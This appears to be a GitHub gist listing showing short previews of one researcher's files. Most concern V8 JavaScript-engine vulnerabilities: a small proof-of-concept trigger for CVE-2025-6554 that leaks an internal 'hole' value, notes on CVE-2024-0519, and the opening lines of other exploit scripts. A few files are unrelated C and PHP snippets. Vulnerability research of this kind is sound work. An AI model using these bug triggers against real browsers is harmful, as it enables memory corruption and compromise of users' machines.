mistymntncop
mistymntncop
/ CVE-2025-6554 POC.js
Last active
July 4, 2025 03:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function leak_hole() { | |
| let x; | |
| delete x?.[y]?.a; | |
| return y; | |
| let y; | |
| } | |
| function pwn() { | |
| let hole = leak_hole(); | |
| %DebugPrint(hole); | |
| } |
mistymntncop
/ zipper.c
Last active
May 18, 2025 10:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #include <stdbool.h> | |
| #include <malloc.h> | |
| #include <assert.h> | |
| //Just pedagogical. No proper memory managagement here, would use Arenas in practice | |
| enum { |
mistymntncop
/ zipper_per.c
Last active
May 16, 2025 06:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #include <stdbool.h> | |
| #include <malloc.h> | |
| #include <assert.h> | |
| //Just pedagogical. No proper memory managagement here, would use Arenas in practice | |
| #define NODE_CHILD_COUNT 2 |
mistymntncop
/ zipper.c
Last active
May 16, 2025 11:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #include <stdbool.h> | |
| #include <malloc.h> | |
| #include <assert.h> | |
| //Just pedagogical. No proper memory managagement here, would use Arenas in practice | |
| #define NODE_CHILD_COUNT 2 |
mistymntncop
/ CVE-2024-0519 notes
Created
January 14, 2025 06:26
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Preconditons | |
| //---------------------- | |
| // (1) The receiver must be a regular object and the key a unique name. | |
| // this excludes special objects such as globalThis, wasm object, etc | |
| // (2) The property to be deleted must be the last property. | |
| // (3) The property to be deleted must be deletable. | |
| // this excludes non-configurable properties. So no frozen or sealed objects. | |
| // (4) The map must have a back pointer. | |
| // this excludes prototype maps | |
| // (5) The last transition must have been caused by adding a property |
mistymntncop
/ 339736513.js
Last active
June 4, 2024 12:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| d8.file.execute("wasm-module-builder.js"); | |
| let builder = new WasmModuleBuilder(); | |
| let array_type = builder.addArray(kWasmI32, true); | |
| builder.addFunction('create_array', makeSig([kWasmI32], [wasmRefType(array_type)])) | |
| .addBody([ | |
| kExprLocalGet, 0, | |
| kGCPrefix, kExprArrayNewDefault, array_type, | |
| ]) |
mistymntncop
/ CVE-2024-4761.js
Last active
May 6, 2025 03:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Build d8 using: | |
| // a) Run once | |
| // git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71 | |
| // gclient sync | |
| // gn gen ./out/x64.debug | |
| // gn gen ./out/x64.release | |
| // | |
| // b) | |
| // Debug Build: | |
| // ninja -C ./out/x64.debug d8 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdbool.h> | |
| #include <windows.h> | |
| #include "nt_crap.h" | |
| #define ArrayCount(arr) (sizeof(arr)/sizeof(arr[0])) | |
| #define assert(expr) if(!(expr)) { *(char*)0 = 0; } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php header("Status: 204"); ?> |
mistymntncop
/ v8sbx.js
Created
November 25, 2023 10:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //v8 version 11.4.183.19 | |
| //git checkout 56e5481171da3eacd3cb83db2be3b2d2b96b4abb | |
| //MODIFY BUILD.gn in the root v8 folder to enable the memory corruption api | |
| //v8_expose_memory_corruption_api = true | |
| //ninja -C ./out/x64.debug d8 | |
| //ninja -C ./out/x64.release d8 | |
| const addr_of = (o) => { | |
| return Sandbox.getAddressOf(o); |
NewerOlder